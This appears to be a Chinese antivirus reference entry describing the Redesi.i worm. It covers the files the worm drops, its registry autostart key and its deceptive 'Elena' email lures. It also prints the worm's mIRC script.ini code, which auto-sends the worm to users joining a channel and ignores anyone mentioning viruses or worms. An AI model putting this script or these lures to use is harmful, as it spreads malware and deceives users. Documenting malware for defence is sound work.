概述
病毒別名:I-Worm.Redesi.i 【AVP】,I-Worm/Redesi.i 【KV】,Worm.Redesi.i【RS】
處理時間:
威脅級別:★★
中文名稱:紅絲帶變種I
病毒行為:
這是一個通過電子郵件和mIRC聊天系統傳播的蠕蟲病毒。該病毒發作的時候將7個病毒副本和1張名為“Elena”的照片拷貝到C糟根目錄下,在註冊表中添加啟動項,實現病毒的開機自啟動。通過修改mIRC的腳本配置檔案script.ini的內容,使得病毒能夠通過mIRC來傳播。該病毒在Outlook Express的地址薄里收集郵件地址,再將病毒做為附屬檔案傳送出去,該郵件極具欺騙性,用戶很可能會受騙而去打開附屬檔案,從而感染該病毒。病毒釋放的8個檔案(7個病毒副本和1張Elena的照片):
1)在C糟根目錄下釋放以下檔案:
C:\elena.jpg (一人物圖片)
C:\elena.scr (病毒副本)
C:\YouandMe.exe (病毒副本)
C:\Me.pif (病毒副本)
C:\Mylove.pif (病毒副本)
C:\myfullpicture.scr (病毒副本)
C:\aboutme.exe (病毒副本)
C:\you.exe (病毒副本)
2)在註冊表中添加啟動項:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Default)="C:\me.pif"
3)取下面的某一行做為郵件主題:
Hey baby !
She makes me feel alive her power more than words can say.
Sends Shivers through my person, clears my head to face the day.
Can't we sort this out ?
I was wrong, I'm sorry.
I know I was a bitch
We belong together
Can't resist, thats where we went wrong.
I hear the ocean beat upon the shore outside my room.
Calling me up from sleep to listen to her gracefull tune.
It's gonna be a lovely day.
Don't ask me what I smoke. But I drink to get drunk.
I kept watching the way you move.
Seaside Atmosphere.
Two people, barely tocuhing each other.
4)取下面的某一段做為郵件的正文:
Hey baby
Sorry I was such a bitch to you. Is there no way we can sort this out ?
The last few days have been hell without you... I miss you
I've attached a picture ... thought you might like it.
Please call me !
All my love. Elena
Hey darlin
I'll be home in a few days, can't wait to see you again ;-)
Attached a picture we took on Saturday at gatecrasher. Love ya
Elena =x=
Hi sexy.
Went to Gatecrasher on Saturday, it was absoultly brilliant !!!
here is a picture of me by the bar (as usual heh)
Be home tommorrow.
Love Elena
5)向mIRC的腳本配置檔案script.ini中寫入以下內容,使得病毒能夠通過mIRC來傳播:
【script】
n0= on 1:JOIN:#:{
n1= .msg $nick Hey. check out my picture and let me know what you think. Youll be pleasantly suprised.
n2= .copy C:\elena.scr C:\mirc\MyFullpic.jpg .pif
n3= .dcc send $nick C:\mirc\MyFullpic.jpg .pif
n4= }
n5= on 1:text:*script.ini*:?:/.ignore $nick
n6= on 1:text:*virus*:?:/.ignore $nick
n7= on 1:text:*worm*:?:/.ignore $nick
n8= on 1:text:*script.ini*:#:/.ignore $nick
n9= on 1:text:*virus*:#:/.ignore $nick
n10= on 1:text:*worm*:#:/.ignore $nick
n11=on 1:text:*redesi*:#:/nick Elena_MM
n12=on 1:text:*elena*:#:/nick I_got_worms
n13=on 1:text:*sex*:#:/nick Elena_worm
n14=on 1:text:*cyber*:#:/nick Win32_Elena
n14=on 1:text:*e*:#:/me Thinks Elena is stunning.
n14=on 1:text:*a*:#:/join #teamvirus
n14=on 1:text:*s*:#:/say my next worm will be called Zor probably :)
n14=on 1:text:*i*:#:/join #teamvirus
n14=on 1:text:*hey*:#:/say W32.Elena, by Gobo
